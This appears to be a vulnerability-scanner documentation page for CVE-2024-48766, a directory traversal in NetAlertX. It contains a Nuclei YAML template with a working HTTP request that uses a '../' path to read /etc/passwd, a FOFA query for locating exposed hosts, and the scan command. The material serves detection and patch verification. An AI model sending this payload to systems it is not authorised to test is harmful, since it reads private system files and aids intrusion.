NetAlert X - Arbitary File Read
ID: CVE-2024-48766
Severity: critical
Author: s4e-io
Tags: cve,cve2024,netalertx,lfi
Description
Section titled “Description”A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.
YAML Source
Section titled “YAML Source”id: CVE-2024-48766
info: name: NetAlert X - Arbitary File Read author: s4e-io severity: critical description: | A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12. impact: | This vulnerability allows remote attackers to list directories on the affected system. Successful exploitation could enable unauthorized users to explore the system’s internal structure. remediation: | Fixed in v24.10.12 reference: - https://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2024-1358.html - https://github.com/rapid7/metasploit-framework/pull/19881 - https://github.com/jokob-sk/NetAlertX metadata: verified: true max-request: 1 vendor: jokob-sk product: netalertx fofa-query: "NetAlert X" tags: cve,cve2024,netalertx,lfi
variables: filename: "{{rand_base(6)}}"
http: - raw: - | POST /php/components/logs.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
items=[{"buttons":[{"labelStringCode":"Maint_PurgeLog","event":"logManage(app.log, cleanLog)"},{"labelStringCode":"Maint_RestartServer","event":"askRestartBackend()"}],"fileName":"{{filename}}","filePath":"../../../../..//etc/passwd","textAreaCssClass":"logs"}]
matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body)" - 'contains(body, "Purge log")' - 'status_code == 200' condition: and# digest: 4a0a00473045022100d6141d123f24949cd043374811e347ee1db9b92dcbbbbca7e9ac5b5632014b32022060e7f7b8fdfb376ccc738f28a00ef62443afd3a9c456cb7e695d4cdc6530c066:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-48766.yaml"